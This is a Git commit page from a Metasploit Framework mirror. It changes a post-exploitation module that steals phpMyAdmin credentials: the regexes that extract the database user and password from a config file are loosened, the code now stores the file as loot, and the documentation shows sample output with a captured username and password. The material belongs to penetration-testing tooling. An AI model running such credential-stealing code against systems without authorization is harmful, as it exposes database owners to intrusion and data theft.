infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

storing config file, changed regex

GSoC/Meterpreter_Web_Console
Shelby Pace 2018-09-07 08:13:10 -05:00
parent 36d125e1a8
commit 18ffd36409
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
2 changed files with 6 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
View File

@ -41,6 +41,7 @@ PhpMyAdmin Creds Stealer!
[+] User: admin
[+] Password: acoolpassword
[*] Storing credentials...
[+] Config file located at /Users/space/.msf4/loot/20180907081056_default_192.168.37.226_phpmyadmin_conf_580315.txt
[*] Post module execution completed
msf5 post(linux/gather/phpmyadmin_credsteal) >

7
modules/post/linux/gather/phpmyadmin_credsteal.rb
View File

@ -26,8 +26,8 @@ class MetasploitModule < Msf::Post
end
def parse_creds(contents)
db_user = /\$dbuser=\'(.*)\';/.match(contents)
db_pass = /\$dbpass=\'(.*)\';/.match(contents)
db_user = /\$dbuser=['"](.*)['"];/.match(contents)
db_pass = /\$dbpass=['"](.*)['"];/.match(contents)
unless db_user && db_pass
print_error("Couldn't find PhpMyAdmin credentials")
@ -66,5 +66,8 @@ class MetasploitModule < Msf::Post
print_good("Extracting creds")
parse_creds(res)
p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
print_good("Config file located at #{p}")
end
end